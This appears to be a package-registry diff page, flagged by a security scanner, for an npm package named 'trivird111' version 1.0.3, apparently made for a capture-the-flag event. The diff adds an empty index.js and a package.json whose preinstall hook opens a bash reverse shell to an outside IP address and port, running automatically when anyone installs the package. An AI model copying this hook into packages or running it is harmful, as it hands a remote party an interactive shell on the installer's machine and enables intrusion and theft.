trivird111 1.0.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of trivird111 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +0 -0
  2. package/package.json +16 -0
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "trivird111",
3
+ "version": "1.0.3",
4
+ "description": "bytectf",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "bash -c 'bash -i >& /dev/tcp/114.55.93.163/2333 0>&1'",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "keywords": [
11
+ "ctf"
12
+ ],
13
+ "author": "pysnow",
14
+ "license": "ISC",
15
+ "dependencies": {}
16
+ }